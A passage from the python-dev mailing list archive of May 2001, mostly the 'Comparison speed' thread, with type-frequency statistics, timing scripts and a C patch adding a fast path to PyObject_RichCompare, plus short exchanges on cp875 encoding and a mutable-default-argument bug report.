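    """Alternative: ask < first and fall back to == at every position."""
    for x, y in zip(v, w):
        if x < y:
            return True
        if not x == y:      # neither less nor equal: v cannot be less
            return False
    return len(v) < len(w)


def comparisons(strategy, v, w):
    """Run one strategy and report (result, number of element comparisons)."""
    Counted.calls = 0
    result = strategy(v, w)
    return result, Counted.calls


v = tuple(Counted(i) for i in range(100))
w = tuple(Counted(i) for i in range(100))
```

For two equal 100-element tuples, `comparisons(eq_first, v, w)` reports 100 element comparisons and `comparisons(lt_first, v, w)` reports 200. The alternative would make Tim's `C` example answer true, but at that price for well-behaved items.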

--Guido van Rossum (home page: http://www.python.org/~guido/)


From martin at loewis.home.cs.tu-berlin.de  Tue May 15 22:59:56 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Tue, 15 May 2001 22:59:56 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
Message-ID: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de>

> Of course.  But except for instance objects, answering "does the type
> implement tp_richcompare?" is one lousy pointer check

Almost - you also have to check the type flag.

> and the answer will usually be-- provided we don't start stuffing
> code into *every* object's tp_richcompare slot! --"no, so I can go
> to tp_compare immediately".  Coercions and richcmps are the oddball
> cases today.

I'd like to add another data point, answering the question what types
are most frequently compared. The first set of data is for running the
Python testsuite.

riches      3040952  # Calls to PyObject_RichCompare
eqs         2828345  # Calls where the types are equal

String      2323122
Float        141507
Int          125187
Type          99477
Tuple         84503
Long          30325
Unicode       10782
Instance       9335
List           2997
None            383
Class           318
Complex         219
Dict             57
Array            49
WeakRef          34
Function         11
File             11
SRE_Pattern      10
CFunction         9
Lock              8
Module            1

So strings cover 82% of all the compare calls of equally-typed
objects, followed by floats with 5%. Equally-typed calls in turn
cover 93% of all richcompare calls.

Since this might give a blurred view of what is actually used in
applications, I ran the PyXML testsuite with that python binary
also. Leaving out types that are not used, I get

riches        88465
eqs           59279

String        48097
Int            5681
Type           3170
Tuple           760
List            492
Float           332
Instance        269
Unicode         243
None            225
SRE_Pattern       4
Long              3
Complex           3

The first observation here is that "only" 67% of the calls are with
equally-typed objects. Of those, 80% are with strings, 9% with
integers.

The last example is IDLE, where I just did an "import httplib", for
fun.

riches        50923
eqs           49882

String        31198
Tuple          8312
Type           7978
Int            1456
None            600
SRE_Pattern     210
List            122
Instance          4
Float             1
Instance method   1

Roughly the same picture: 97% calls with equally-typed objects, of
those 62% strings, 3% integers. Notice the 15% for tuples and types,
each.

So to speed-up the common case clearly means to speed-up string
comparisons. If I'd need to optimize anything else afterwards, I'd
look into type objects - most likely, they are compared for EQ, which
can be done nicely and directly in a tp_richcompare also.

Together with tuples, which already have one, those two optimizations
would give a richcompare to 95% of the objects in the IDLE case.

Regards,
Martin


From guido at digicool.com  Wed May 16 00:41:12 2001
From: guido at digicool.com (Guido van Rossum)
Date: Tue, 15 May 2001 17:41:12 -0500
Subject: [Python-Dev] Comparison speed
In-Reply-To: Your message of "Tue, 15 May 2001 22:59:56 +0200."
             <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> 
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>  
            <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> 
Message-ID: <200105152241.RAA00926@cj20424-a.reston1.va.home.com>

I'm curious where the frequent comparisons of types come from.

Is there lots of code that does frequent

    assert type(x) == T

typechecking?

Does isinstance(x, T) perhaps use EQ?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From barry at digicool.com  Tue May 15 23:51:00 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Tue, 15 May 2001 17:51:00 -0400
Subject: [Python-Dev] Comparison speed
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
	<200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de>
	<200105152241.RAA00926@cj20424-a.reston1.va.home.com>
Message-ID: <15105.42180.401918.223487@anthem.wooz.org>

>>>>> "GvR" == Guido van Rossum <guido at digicool.com> writes:

    GvR> I'm curious where the frequent comparisons of types come
    GvR> from.

    GvR> Is there lots of code that does frequent

    GvR>     assert type(x) == T

    GvR> typechecking?

    GvR> Does isinstance(x, T) perhaps use EQ?

Not to mention the several hundred comparisons to None.


From jeremy at digicool.com  Tue May 15 19:26:54 2001
From: jeremy at digicool.com (Jeremy Hylton)
Date: Tue, 15 May 2001 13:26:54 -0400 (EDT)
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105152241.RAA00926@cj20424-a.reston1.va.home.com>
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
	<200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de>
	<200105152241.RAA00926@cj20424-a.reston1.va.home.com>
Message-ID: <15105.26334.610144.846269@slothrop.digicool.com>

I only learned recently that isinstance() can be called with types
instead of classes.  I suppose the name led me in the wrong
direction.  I had the silly idea that it only applied to instances
<0.1 wink>.

So it comes as little surprise to me that there is a lot of code
executed in, e.g., the test suite that does comparisons on types.

In the Lib directory, there are 63 files that use == and the builtin
type function.  (Simple grep.)  A total of 139 instances of this
idiom.  A cursory scan suggests that most of the calls are things like
type(obj) == type('').

In the Zope source tree, there are 58 files and 98 individual
occurrences.  It again looks like comparisons against the string type
are the most common.

I can think of two common cases where an object is checked against the
string type.  One is an interface that takes a file-like object or its
path.  The other is an interface that takes a sequence, but doesn't
want to try a string as a sequence.

Sounds like we ought to do a search-and-destroy on type comparisons,
replacing with isinstance() where possible.
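Here is a sketch of the two idioms described above, rewritten with `isinstance()` instead of `type(obj) == type('')`. `open_source` and `as_items` are hypothetical helper names. In Python 3, `str` stands in for `StringType`. One behavioral difference is that `isinstance()` also accepts subclasses of `str`, which the `==` test rejects.

```python
def open_source(source):
    """Accept either a path or an already-open file-like object."""
    if isinstance(source, str):      # instead of: type(source) == type('')
        return open(source)
    return source                    # assume it already has .read()


def as_items(seq):
    """Accept a sequence of items, but treat a lone string as one item."""
    if isinstance(seq, str):         # a string is a sequence, but not the one we want
        return [seq]
    return list(seq)
```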

Jeremy


From jeremy at digicool.com  Tue May 15 19:41:58 2001
From: jeremy at digicool.com (Jeremy Hylton)
Date: Tue, 15 May 2001 13:41:58 -0400 (EDT)
Subject: [Python-Dev] FYI: MIT's dynamic language design panel now online
In-Reply-To: <20010515115120.A14357@glacier.fnational.com>
References: <000901c0dd6b$cdb5d960$e46940d5@hagrid>
	<20010515115120.A14357@glacier.fnational.com>
Message-ID: <15105.27238.582785.851371@slothrop.digicool.com>

I downloaded one of the files, but the QuickTime player I have on my
Windows box said it didn't understand the file format.  I eventually
got the streaming version at 100kbps to "work", where work meant
mostly an audio feed and occasional stills that were recognizable.

Jeremy

PS It was cool to watch the one on compilation.  Mat Hostetter, one of
the panelists, is my old roommate!


From barry at digicool.com  Wed May 16 00:56:10 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Tue, 15 May 2001 18:56:10 -0400
Subject: [Python-Dev] Comparison speed
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
	<200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de>
	<200105152241.RAA00926@cj20424-a.reston1.va.home.com>
	<15105.26334.610144.846269@slothrop.digicool.com>
Message-ID: <15105.46090.203278.397835@anthem.wooz.org>

>>>>> "JH" == Jeremy Hylton <jeremy at digicool.com> writes:

    JH> I only learned recently that isinstance() can be called with
    JH> types instead of classes.  I suppose the name lead me in the
    JH> wrong direction.  I had the silly idea that it only applied to
    JH> instances <0.1 wink>.

    JH> So it comes as little surprise to me that there is a lot of
    JH> code executed in, e.g., the test suite that does comparisons
    JH> on types.

    JH> In the Lib directory, there are 63 files that use == and the
    JH> builtin type function.  (Simple grep.)  A total of 139
    JH> instances of this idiom.  A cursory scan suggests that most of
    JH> the call are things like type(obj) == type('').

Even without the forward-looking insight that types are classes
<wink>, I think type comparisons should have been done with `is' and
not ==.  So old school type comparisons should have been done as

    type(obj) is StringType

whereas new school type comparisons should be done as

    isinstance(obj, StringType)

With Python 2.1, == is naturally slower than `is', but isinstance()
comes in somewhere in the middle.

563897.802881 is comparisons per second
506827.201066 == comparisons per second
520696.916088 isinstance() comparisons per second

-Barry

-------------------- snip snip --------------------
from types import StringType
import time
r = range(1000000)

def one(r=r):
    x = 'hello'
    t0 = time.time()
    for i in r:
        type(x) is StringType
    t1 = time.time() - t0
    print len(r) / t1, 'is comparisons per second'

def two(r=r):
    x = 'hello'
    t0 = time.time()
    for i in r:
        type(x) == StringType
    t1 = time.time() - t0
    print len(r) / t1, '== comparisons per second'

def three(r=r):
    x = 'hello'
    t0 = time.time()
    for i in r:
        isinstance(x, StringType)
    t1 = time.time() - t0
    print len(r) / t1, 'isinstance() comparisons per second'


one()
two()
three()
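For anyone repeating this measurement on a current interpreter, here is a sketch using the standard `timeit` module instead of hand-rolled `time.time()` loops. `str` replaces `types.StringType`, which no longer exists in Python 3. The numbers it prints will depend entirely on the machine and interpreter version.

```python
import timeit

SETUP = "x = 'hello'"
STATEMENTS = {
    "is": "type(x) is str",
    "==": "type(x) == str",
    "isinstance()": "isinstance(x, str)",
}


def rates(number=1_000_000):
    """Return comparisons per second for each idiom (best of 3 runs)."""
    results = {}
    for label, stmt in STATEMENTS.items():
        best = min(timeit.repeat(stmt, setup=SETUP, repeat=3, number=number))
        results[label] = number / best
    return results


if __name__ == "__main__":
    for label, rate in rates().items():
        print(f"{rate:14.1f} {label} comparisons per second")
```

Taking the minimum of several repeats is the usual `timeit` practice, since slower runs mostly reflect interference from the rest of the system.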

From tim.one at home.com  Wed May 16 01:49:03 2001
From: tim.one at home.com (Tim Peters)
Date: Tue, 15 May 2001 19:49:03 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105151945.f4FJjxM02351@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEGKKCAA.tim.one@home.com>

Making the 5am email concrete, this is what I meant:

Index: object.c
===================================================================
RCS file: /cvsroot/python/python/dist/src/Objects/object.c,v
retrieving revision 2.131
diff -c -r2.131 object.c
*** object.c	2001/05/11 03:36:45	2.131
--- object.c	2001/05/15 23:39:24
***************
*** 835,841 ****
  		}
  	}
  	else {
! 		res = do_richcmp(v, w, op);
  	}
  	compare_nesting--;
  	return res;
--- 835,863 ----
  		}
  	}
  	else {
! 		cmpfunc f;
! 		if (v->ob_type == w->ob_type
! 		    && RICHCOMPARE(v->ob_type) == NULL
! 		    && (f = v->ob_type->tp_compare) != NULL)
! 		{
! 			int c = (*f)(v, w);
! 			if (c < 0 && PyErr_Occurred())
! 				res = NULL;
! 			else {
! 				switch (op) {
! 					case Py_LT: c = c <  0; break;
! 					case Py_LE: c = c <= 0; break;
! 					case Py_EQ: c = c == 0; break;
! 					case Py_NE: c = c != 0; break;
! 					case Py_GT: c = c >  0; break;
! 					case Py_GE: c = c >= 0; break;
! 				}
! 				res = c ? Py_True : Py_False;
! 				Py_INCREF(res);
! 			}
! 		}
! 		else
! 			res = do_richcmp(v, w, op);
  	}
  	compare_nesting--;
  	return res;

That's a local change to PyObject_RichCompare, taking a fast path for most
scalar types (which don't have richcmps but do have tp_compare today).  On my
Win98 box reproducible timings are impossible, but it obviously chops out
layers and layers of function calls and redundant tests when it triggers.
That appears to be more often than not across all apps I've tried, from 60%
of PyObject_RichCompare calls to nearly 100%.
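The `switch` in the patch maps a three-way result `c` (negative, zero or positive) onto the six rich-comparison operators. The sketch below expresses the same mapping in Python with the `operator` module. `OPS`, `three_way` and `rich_from_cmp` are illustrative names, and the string keys stand in for the C constants `Py_LT` ... `Py_GE`.

```python
import operator

# Each rich operator is decided by comparing the 3-way result against 0,
# as "c = c < 0" and friends do in the C fast path.
OPS = {
    "Py_LT": operator.lt,
    "Py_LE": operator.le,
    "Py_EQ": operator.eq,
    "Py_NE": operator.ne,
    "Py_GT": operator.gt,
    "Py_GE": operator.ge,
}


def three_way(a, b):
    """A tp_compare-style result: -1, 0 or 1."""
    return (a > b) - (a < b)


def rich_from_cmp(a, b, op):
    """Answer a rich comparison from a single three-way comparison."""
    c = three_way(a, b)
    return OPS[op](c, 0)
```

The point of the fast path is that one `tp_compare` call answers any of the six operators.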


From tim.one at home.com  Wed May 16 02:01:05 2001
From: tim.one at home.com (Tim Peters)
Date: Tue, 15 May 2001 20:01:05 -0400
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Objects tupleobject.c,2.48,2.49
In-Reply-To: <200105152136.QAA00489@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEGMKCAA.tim.one@home.com>

[Tim]
> BUG ALERT:  The tuple (and list) richcmp algorithm is arguably wrong,
> because it won't believe there's any difference unless Py_EQ
> returns false for some corresponding elements:
>
> >>> class C:
> ...     def __lt__(x, y): return 1
> ...     __eq__ = __lt__
> ...
> >>> C() < C()
> 1
> >>> (C(),) < (C(),)
> 0
> >>>
>
> That doesn't make sense -- provided you believe the defn. of C
> makes sense.

[Guido]
> I think in this example the problem is with C, not with the tuple
> algorithm.

I can live with that.

> The question is, what are you going to do otherwise?  You
> could test for < first, == second -- but that means twice as many
> comparisons, and for reasonably-behaved items it makes no difference
> at all.

The question remaining is how much of this list/tuple richcmp behavior is
guaranteed by the language and how much is just implementation-dependent
fuzz.

For a more vanilla example, I removed the EQ/NE "lengths differ?" tuple
richcmp early-exit test because I never found code that made it trigger
(but tons of code that gets there without triggering).  But this has semantic
implications too:  an implementation without the early exit may call
user-defined comparison routines that raise exceptions when comparing tuples
of different lengths now.  Do you care?  (I don't.)
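The semantic change can be seen by comparing a tuple and a list of different lengths whose first elements raise from `__eq__`. `Touchy` and `raises` are made-up names. The expected outcomes reflect CPython as far as I know: `list` kept a length early exit for `==`/`!=`, and `tuple` does not have one. Treat both outcomes as implementation details rather than language guarantees.

```python
class Touchy:
    """Any == comparison between two Touchy objects raises."""
    def __eq__(self, other):
        raise RuntimeError("__eq__ called")


def raises(thunk):
    """Return True if calling thunk() raises RuntimeError."""
    try:
        thunk()
    except RuntimeError:
        return True
    return False


# Different lengths, and distinct (non-identical) first elements.
tuple_raised = raises(lambda: (Touchy(),) == (Touchy(), 1))  # element __eq__ runs
list_raised = raises(lambda: [Touchy()] == [Touchy(), 1])    # lengths decide first
```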


From tim.one at home.com  Wed May 16 02:37:56 2001
From: tim.one at home.com (Tim Peters)
Date: Tue, 15 May 2001 20:37:56 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEGMKCAA.tim.one@home.com>

[Martin v. Loewis]
> ...
> I'd like to add another data point, answering the question what types
> are most frequently compared.

That varies wildly by app.  I have apps where int compares *overwhelmingly*
dominate, others where float compares do, many where string compares do, and
the last code I wrote for Zope spends most of its (very substantial) time
doing lookups of "object ids" in dicts.  In Python terms, those are Pythong
lon (unbounded) ints today, and potentially Python ints on 64-bit boxes, and
that's another case where ceval.c's special-casing of int compares is
impotent.

Heck, sort a large homogeneous array once, and whatever element type that
array has will likely dominate comparisons for the whole app!

That's why I'm so keen to chop out a half dozen layers of blubber for *all*
types that don't play the richcmp game (which today includes every type I
mentioned above).

> The first set of data is for running the Python testsuite.
>
> riches      3040952  # Calls to PyObject_RichCompare
> eqs         2828345  # Calls where the types are equal
>
> String      2323122
> Float        141507
> Int          125187
> Type          99477
> Tuple         84503
> Long          30325
> Unicode       10782
> Instance       9335
> List           2997
> None            383
> Class           318
> Complex         219
> Dict             57
> Array            49
> WeakRef          34
> Function         11
> File             11
> SRE_Pattern      10
> CFunction         9
> Lock              8
> Module            1
>
> So strings cover 82% of all the compare calls of equally-typed
> objects, followed by floats with 5%. Those calls together cover 93% of
> the richcompare calls.
>
> Since this might give a blurred view of what is actually used in
> applications,

Note that the top 4 types don't have a tp_richcompare slot today.  The tuples
are likely composed of simple scalar types, and the latter benefit too.  But
as above, we can't say anything in advance about the *specific* types a given
app is going to compare most often.  There is no "typical app" in that
respect.

> I ran the PyXML testsuite with that python binary
> also. Leaving out types that are not used, I get
>
> riches        88465
> eqs           59279
>
> String        48097
> Int            5681
> Type           3170
> Tuple           760
> List            492
> Float           332
> Instance        269
> Unicode         243
> None            225
> SRE_Pattern       4
> Long              3
> Complex           3
>
> The first observation here is that "only" 67% of the calls are with
> equally-typed objects.

Someone who cares about the speed of PyXML would be well advised to figure
out why <0.9 wink>:  there's no scheme on the horizon that will speed
mixed-type comparisons one whit.

> Of those, 80% are with strings, 9% with integers.

XML is a string-crunching app, right?

> The last example is idle, where I just did an "import httplib", for
> fun.
>
> riches        50923
> eqs           49882
>
> String        31198
> Tuple          8312
> Type           7978
> Int            1456
> None            600
> SRE_Pattern     210
> List            122
> Instance          4
> Float             1
> Instance method   1
>
> Roughly the same picture: 97% calls with equally-typed objects, of
> those 62% strings, 3% integers. Notice the 15% for tuples and types,
> each.

Surprising!

> So to speed-up the common case clearly means to speed-up string
> comparisons.

The only thing the apps I've tried have in common is that the types compared
most often do have tp_compare but not tp_richcompare functions.  The test
suite, XML and IDLE are all heavy string-slingers.

> If I'd need to optimize anything else afterwards, I'd look into type
> objects - most likely, they are compared for EQ, which can be done
> nicely and directly in a tp_richcompare also.

Would do just as well to give them a one-liner tp_compare function (in
conjunction with the posted patch).

> Those two optimizations together would give a richcompare to 95% of
> the objects in the IDLE case.

Since that's the exact opposite of what I want to do, it's at least
interesting <wink>.  Whatever, there needs to be a (very) fast path, and it
needs to pick on something that all common types implement, including at
least strings, ints, longs, floats and-- I guess --type objects.

I don't know about other people, but I have lots of code that uses the cmp()
function heavily.  That path has also gotten bloated, and tries each of
Py_EQ, Py_LT and Py_GT in turn now, hoping for *one* of them to say "yes".
It does this now even if the tp_compare slot is defined.  The only thing
that's saving cmp()-slinging code from major sloth now is that the basic
types do *not* implement tp_richcompare, so try_rich_to_3way_compare gets out
early (before doing the three-way Py_EQ etc dance).  But give the basic
scalar types richcmp functions, and cmp() will slow down a lot (unless more
hacks are added to stop that).
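As a rough Python sketch of the path described above, for objects that only have rich comparisons, the code tries `==`, then `<`, then `>`, stopping at the first one that says yes. `rich_to_3way` is a hypothetical name loosely modelled on `try_rich_to_3way_compare`. `Probe` just counts how many rich comparisons each `cmp()`-style call costs.

```python
class Probe:
    """Integer wrapper that counts rich comparisons."""
    calls = 0

    def __init__(self, value):
        self.value = value

    def __eq__(self, other):
        Probe.calls += 1
        return self.value == other.value

    def __lt__(self, other):
        Probe.calls += 1
        return self.value < other.value

    def __gt__(self, other):
        Probe.calls += 1
        return self.value > other.value


def rich_to_3way(v, w):
    """Return -1, 0 or 1 by asking ==, < and > in turn."""
    if v == w:
        return 0
    if v < w:
        return -1
    if v > w:
        return 1
    raise TypeError("no ordering between the operands")


def cost(a, b):
    """Return (three-way result, number of rich comparisons it took)."""
    Probe.calls = 0
    result = rich_to_3way(Probe(a), Probe(b))
    return result, Probe.calls
```

A "greater than" answer takes three rich comparisons here, where a single `tp_compare` call would have been enough.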


From greg at cosc.canterbury.ac.nz  Wed May 16 03:58:05 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Wed, 16 May 2001 13:58:05 +1200 (NZST)
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCOEGMKCAA.tim.one@home.com>
Message-ID: <200105160158.NAA18339@s454.cosc.canterbury.ac.nz>

Tim Peters <tim.one at home.com>:

> In Python terms, those are Pythong lon (unbounded) ints today
                             ^^^^^^^
What Pythonistas wear on their feet?

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From esr at thyrsus.com  Wed May 16 04:27:38 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Tue, 15 May 2001 22:27:38 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105160158.NAA18339@s454.cosc.canterbury.ac.nz>; from greg@cosc.canterbury.ac.nz on Wed, May 16, 2001 at 01:58:05PM +1200
References: <LNBBLJKPBEHFEDALKOLCOEGMKCAA.tim.one@home.com> <200105160158.NAA18339@s454.cosc.canterbury.ac.nz>
Message-ID: <20010515222738.A9996@thyrsus.com>

Greg Ewing <greg at cosc.canterbury.ac.nz>:
> Tim Peters <tim.one at home.com>:
> 
> > In Python terms, those are Pythong lon (unbounded) ints today
>                              ^^^^^^^
> What Pythonistas wear on their feet?

No, man.  It's what sexy lady Pythonistas wear on the beach in Rio.

(Yes, I know some sexy lady Pythonistas.  No, you can't have their
phone numbers.  Pthfthfthpht...)
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

Question with boldness even the existence of a God; because, if there
be one, he must more approve the homage of reason, than that of
blindfolded fear.... Do not be frightened from this inquiry from any
fear of its consequences. If it ends in the belief that there is no
God, you will find incitements to virtue in the comfort and
pleasantness you feel in its exercise...
	-- Thomas Jefferson, in a 1787 letter to his nephew


From tim.one at home.com  Wed May 16 09:14:25 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 16 May 2001 03:14:25 -0400
Subject: [Python-Dev] RE: Ill-defined encoding for CP875?
In-Reply-To: <3B00E98E.1C44FF5@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEHLKCAA.tim.one@home.com>

[MAL]
> Round-tripping is obviously very important if you use Unicode
> as basis for working on text.

Since I use 7-bit ASCII exclusively, I've been using

    encode = decode = lambda x: x

I haven't proved that's round-trippable, but haven't bumped into an exception
yet.

> I don't know about the reasoning behind making cp875 fail the
> round-trip -- Unicode certainly provides means to make mappings
> round-trip safe (e.g. by reverting to the private Unicode
> char. point areas).

Then I ignorantly but confidently (indeed, with the cheery confidence only
the truly ignorant can truly enjoy!) vote for your approach that maps the
non-round-trippable cp875 code points to None.  Better safe than sorry, by
default.  Else 6 of the 7 ambiguous chars will be silent surprises by
default.


From tim.one at home.com  Wed May 16 09:25:28 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 16 May 2001 03:25:28 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105151527.KAA28734@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEHLKCAA.tim.one@home.com>

[Guido]
> PEP 207 is quite explicit that == and != are not to be assumed each
> other's complement.  It is silent on the x==x issue but the PEP
> mentions IEEE 754 so I agree that this also shouldn't be cut short.

It's explicit about x==x too:

    (Note: Python currently assumes that x==x is always true
    and x!=x is never true; this should not be assumed.)

That's from the end of point #4, under "Proposed Resolutions".  I agreed
then, and still do <wink>.
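IEEE 754 NaN is the standard example of why x==x cannot be assumed. The check below runs in modern Python 3, not the 2001 interpreter under discussion. Note that lists still take an identity shortcut before calling ==, so a NaN counts as "in" a list holding that same object.

```python
import math

nan = float("nan")
print(nan == nan)       # False: NaN compares unequal to everything, itself included
print(nan != nan)       # True
print(math.isnan(nan))  # True: the reliable way to test for NaN
print(nan in [nan])     # True: list membership checks identity before ==
print([nan] == [nan])   # True: same identity shortcut, element by element
```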


From martin at loewis.home.cs.tu-berlin.de  Wed May 16 09:28:45 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Wed, 16 May 2001 09:28:45 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <15105.26334.610144.846269@slothrop.digicool.com> (message from
	Jeremy Hylton on Tue, 15 May 2001 13:26:54 -0400 (EDT))
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
	<200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de>
	<200105152241.RAA00926@cj20424-a.reston1.va.home.com> <15105.26334.610144.846269@slothrop.digicool.com>
Message-ID: <200105160728.f4G7SjK01766@mira.informatik.hu-berlin.de>

> Sounds like we ought to do a search-and-destroy on type comparisons,
> replacing with isinstance() where possible.

At least in my applications, this is unfortunately not possible: I
want a test for byte-string-or-unicode-string. This could be done with
two isinstance calls, but that is certainly less efficient.

Marc-Andre once proposed a type representing the immediate supertype
of both byte strings and unicode strings; let's call it abstract string.
Then I could write isinstance(e, types.AbstractString).
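Here is a sketch of both options in today's Python 3, where `bytes` and `str` play the roles of byte strings and Unicode strings:

- `isinstance()` accepts a tuple of types. That form arrived in Python 2.2.
- An abstract base class can stand in for the proposed supertype. The name `AbstractString` is hypothetical, borrowed from the paragraph above.

Python 2.3 later added `basestring` in this spirit, and Python 3 dropped it.

```python
from abc import ABC

STRING_TYPES = (bytes, str)


class AbstractString(ABC):
    """Hypothetical common supertype for byte strings and text strings."""


# Register both concrete types as virtual subclasses of the ABC.
AbstractString.register(bytes)
AbstractString.register(str)


def is_string_tuple(obj):
    return isinstance(obj, STRING_TYPES)    # one call, tuple of types


def is_string_abc(obj):
    return isinstance(obj, AbstractString)  # one call, single abstract type


print(is_string_tuple(b"x"), is_string_abc("x"), is_string_abc(42))  # True True False
```

Either form is a single isinstance() call. Unlike `type(e) in [...]`, both also accept subclasses.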

Regards,
Martin


From martin at loewis.home.cs.tu-berlin.de  Wed May 16 09:24:56 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Wed, 16 May 2001 09:24:56 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <15105.42180.401918.223487@anthem.wooz.org> (barry@digicool.com)
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
	<200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de>
	<200105152241.RAA00926@cj20424-a.reston1.va.home.com> <15105.42180.401918.223487@anthem.wooz.org>
Message-ID: <200105160724.f4G7OuF01764@mira.informatik.hu-berlin.de>

>     GvR> I'm curious where the frequent comparisons of types come
>     GvR> from.
> 
> Not to mention the several hundred comparisons to None.

This is harder to analyse; I set a gdb breakpoint on the place where
RichCompare gets PyType_Type, then tried to see what it does, then
ignoring the breakpoint a few times. This is what I've found; I may
miss important cases.

In PyXML, the expression

   type(e) in [types.StringType, types.UnicodeType]

is frequently computed. This is a sequence_contains, which in turn does two
Py_EQ tests. In addition, compile.c:com_add has

   t = Py_BuildValue("(OO)", v, v->ob_type)
   PyDict_GetItem(dict, t)

Again, the dictionary lookup performs Py_EQ on the tuples, which does
Py_EQ on the elements.

This also accounts for the RichCompare calls which receive None: v may
be None, here, so t is (None, type(None)).
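Both patterns can be reproduced from Python with a hypothetical `Counted` class whose `__eq__` tallies its calls. This is a modern Python 3 sketch, and the 2001 code paths differ in detail.

- Membership in a list runs == against each element until one matches.
- Looking up an equal-but-distinct tuple key in a dict, as com_add does with `(v, type(v))`, runs == on the tuples and hence on their elements.

```python
class Counted:
    """Hypothetical value type that counts how often __eq__ runs."""
    eq_calls = 0

    def __init__(self, key):
        self.key = key

    def __eq__(self, other):
        Counted.eq_calls += 1
        if not isinstance(other, Counted):
            return NotImplemented
        return self.key == other.key

    def __hash__(self):
        return hash(self.key)


def count_eq(thunk):
    """Reset the tally, run thunk(), return (result, number of __eq__ calls)."""
    Counted.eq_calls = 0
    return thunk(), Counted.eq_calls


# `x in [a, b]`: one == per element until a match (like the PyXML test).
candidates = [Counted("str"), Counted("unicode")]
print(count_eq(lambda: Counted("unicode") in candidates))  # (True, 2)

# com_add-style lookup: the key is (v, type(v)). An equal but distinct tuple
# forces tuple ==, which compares the elements (identical ones are skipped).
v = Counted("x")
consts = {(v, type(v)): 0}
print(count_eq(lambda: consts[(Counted("x"), Counted)]))  # (0, 1)
```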

In IDLE, the situation is similar. com_add produces many compares with
types. In addition, sre.compile has

   type(s) in sre_compile.STRING_TYPES

which is the same test as the PyXML one. Finally, there is a
type-in-typetuple test inside Tkinter._cnfmerge.

Regards,
Martin


From i_sofer at yahoo.com  Wed May 16 09:53:25 2001
From: i_sofer at yahoo.com (Idan Sofer)
Date: 16 May 2001 10:53:25 +0300
Subject: [Python-Dev] Bug report: empty dictionary as default class argument
Message-ID: <200105160756.KAA29616@alpha.netvision.net.il>

Hello.

I have found a rather annoying bug in Python, present in both Python 1.5
and Python 2.0.

If a class has an argument with a default of an empty dictionary, then
all instances of the same class will point to the same dictionary,
unless the dictionary is explicitly defined by the constructor.

I attach a piece of code that demonstrates the problem
-------------- next part --------------
A non-text attachment was scrubbed...
Name: test.py
Type: text/x-python
Size: 1197 bytes
Desc: not available
URL: <http://mail.python.org/pipermail/python-dev/attachments/20010516/15c1b25b/attachment.py>

From martin at loewis.home.cs.tu-berlin.de  Wed May 16 10:02:01 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Wed, 16 May 2001 10:02:01 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCOEGMKCAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCOEGMKCAA.tim.one@home.com>
Message-ID: <200105160802.f4G821s02180@mira.informatik.hu-berlin.de>

> Since that's the exact opposite of what I want to do, it's at least
> interesting <wink>.

I'll put a patch on SF soon which does what you want to do, i.e. tries
tp_compare as the first thing if tp_richcompare is not there. Even
with this patch, your code is faster if strings have a
richcompare. Without richcompare, I get

0.720
0.720
0.720
0.730
0.720
0.720
0.730
0.720
0.720
0.730

With it, I get

0.710
0.720
0.720
0.710
0.710
0.720
0.710
0.710
0.710
0.720

Given that stock CVS python is in the 0.78 range, the difference is
negligible, though.

Regards,
Martin


From larsga at garshol.priv.no  Wed May 16 10:19:10 2001
From: larsga at garshol.priv.no (Lars Marius Garshol)
Date: 16 May 2001 10:19:10 +0200
